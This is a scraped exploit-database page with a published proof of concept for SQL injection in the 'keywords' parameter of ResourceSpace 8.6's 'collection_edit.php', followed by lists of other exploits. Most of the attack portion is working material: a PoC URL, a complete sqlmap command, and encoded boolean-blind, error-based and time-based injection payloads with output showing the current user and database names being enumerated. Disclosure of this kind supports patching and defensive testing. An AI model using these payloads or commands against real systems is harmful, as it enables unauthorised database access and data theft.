Menu

Search for hundreds of thousands of exploits

"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection"

Author

Exploit author

dd_

Platform

Exploit platform

php

Release date

Exploit published date

2019-01-28

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# Exploit Title: ResourceSpace <=8.6 'collection_edit.php' SQL Injection
# Dork: N/A
# Date: 2019-01-25
# Exploit Author: dd_ (info@malicious.group)
# Vendor Homepage: https://www.resourcespace.com/
# Software Link: https://www.resourcespace.com/get
# Version: Stable release: 8.6
# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
# Vendor Alerted: 1/21/2019
# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.


# POC:
# 1)
# http://localhost/pages/collection_edit.php?CSRFToken=[CRSF_TOKEN_HERE]&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=[SQL]&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0




# Running the SQLMap command:

sqlmap -u 'http://localhost/pages/collection_edit.php' --data='CSRFToken=<csrf token>&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=*&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0' --cookie='language=en-US;language=en-US;thumbs=show;user=3154df279ea69a45caeaccf8a5fd1550;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_themes_order_by=name;saved_themes_sort=ASC;display=thumbs;per_page=48;saved_sort=DESC;geobound=-5244191.6358594%2C-786628.3871876%2C4;plupload_ui_view=list;ui_view_full_site=true' --dbms=mysql --level=5 --risk=3 -p keywords --technique=ETB --dbs --current-user --current-db --is-dba




# Will trigger the following injection methods:


[*] starting @ 13:21:45 /2019-01-25/

[13:21:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keywords (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE (SELECT (CASE WHEN (6076=6076) THEN 0x3125323532372532353246253235324125323532412532353246524c494b452532353246253235324125323532412532353246253235323853454c454354253235324625323532412532353241253235324625323532384341534525323532462532353241253235324125323532465748454e253235324625323532412532353241253235324625323532384f524425323532384d49442532353238253235323853454c454354253235324625323532412532353241253235324649464e554c4c2532353238434153542532353238434f554e54253235323844495354494e43542532353238736368656d615f6e616d65253235323925323532392532353246253235324125323532412532353246415325323532462532353241253235324125323532464348415225323532392532353243307832302532353239253235324625323532412532353241253235324646524f4d2532353246253235324125323532412532353246494e464f524d4154494f4e5f534348454d412e534348454d41544125323532392532353243312532353243312532353239253235323925323533453536253235323925323532462532353241253235324125323532465448454e2532353246253235324125323532412532353246312532353246253235324125323532412532353246454c53452532353246253235324125323532412532353246307832382532353246253235324125323532412532353246454e44253235323925323532392532353246253235324125323532412532353246414e4425323532462532353241253235324125323532462532353237534a584e253235323725323533442532353237534a584e ELSE 0x28 END)) AND 'HDWY'='HDWY&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' AND EXTRACTVALUE(8779,CONCAT(0x5c,0x716b786a71,(SELECT (ELT(8779=8779,1))),0x7176626271)) AND 'cjUk'='cjUk&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: CSRFToken=YzcxMmYxMTcyM2E1NjYyNWFmZTAxZTBlMTZmYjI2OTU2YzI0OWNhZTBjMzNmYzI0ZTRiYWVhYWU4N2RlNTNhNUBAuVxTyzjb6fJYqUBQWsiawgfoEuxQKvG6HI4LkQLUD3zkfW1Ni0V3REGj2AfURF5FBV5DHL75lM567skQLf1dibiUn04ySzgpx6O4j3z1QkGJpnCM27K6wH5lt8Inzhg31+PLoS26LP6ONDFrwQmf07Se8Z2fDtGi5xoJDBM9oHZxqNmrrryGVQpsmcpIYSr/+IsJ/4gExUQdyH4MMfkUuEmkQssMPSJFS6nNQEC9jwrfoxy3p9fApNyEeu+Wofo4UNOtE3sUIux/h3WUjg==&redirect=yes&ref=3620&submitted=true&name=PWNED&keywords=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN' RLIKE SLEEP(5) AND 'EqqU'='EqqU&public=0&autocomplete_parameter=pwned&users=1%27%2F%2A%2A%2FRLIKE%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F%28CASE%2F%2A%2A%2FWHEN%2F%2A%2A%2F%28ORD%28MID%28%28SELECT%2F%2A%2A%2FIFNULL%28CAST%28COUNT%28DISTINCT%28schema_name%29%29%2F%2A%2A%2FAS%2F%2A%2A%2FCHAR%29%2C0x20%29%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.SCHEMATA%29%2C1%2C1%29%29%3E56%29%2F%2A%2A%2FTHEN%2F%2A%2A%2F1%2F%2A%2A%2FELSE%2F%2A%2A%2F0x28%2F%2A%2A%2FEND%29%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27SJXN%27%3D%27SJXN&copy=&save=%C2%A0%C2%A0Save%C2%A0%C2%A0
---
[13:21:47] [INFO] testing MySQL
[13:21:47] [INFO] confirming MySQL
[13:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.0
[13:21:48] [INFO] fetching current user
[13:21:50] [INFO] retrieved: 'pwner@localhost'
current user:    'pwner@localhost'
[13:21:50] [INFO] fetching current database
[13:21:52] [INFO] retrieved: 'resourcespace'
current database:    'resourcespace'
[13:21:52] [INFO] testing if current user is DBA
[13:21:52] [INFO] fetching current user
current user is DBA:    False
[13:21:53] [INFO] fetching database names
[13:21:54] [WARNING] the SQL query provided does not return any output
[13:21:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:21:54] [INFO] fetching number of databases
[13:21:54] [INFO] resumed: 6
[13:21:54] [INFO] resumed: information_schema
[13:21:54] [INFO] resumed: mysql
[13:21:54] [INFO] resumed: performance_schema
[13:21:54] [INFO] resumed: phpmyadmin
[13:21:54] [INFO] resumed: resourcespace
[13:21:54] [INFO] resumed: sys
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] resourcespace
[*] sys

[13:21:54] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/localhost'

[*] ending @ 13:21:54 /2019-01-25/
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-02-04 "ResourceSpace 8.6 - 'watched_searches.php' SQL Injection" webapps php dd_
2019-01-29 "PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)" webapps php dd_
2019-01-28 "ResourceSpace 8.6 - 'collection_edit.php' SQL Injection" webapps php dd_ 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected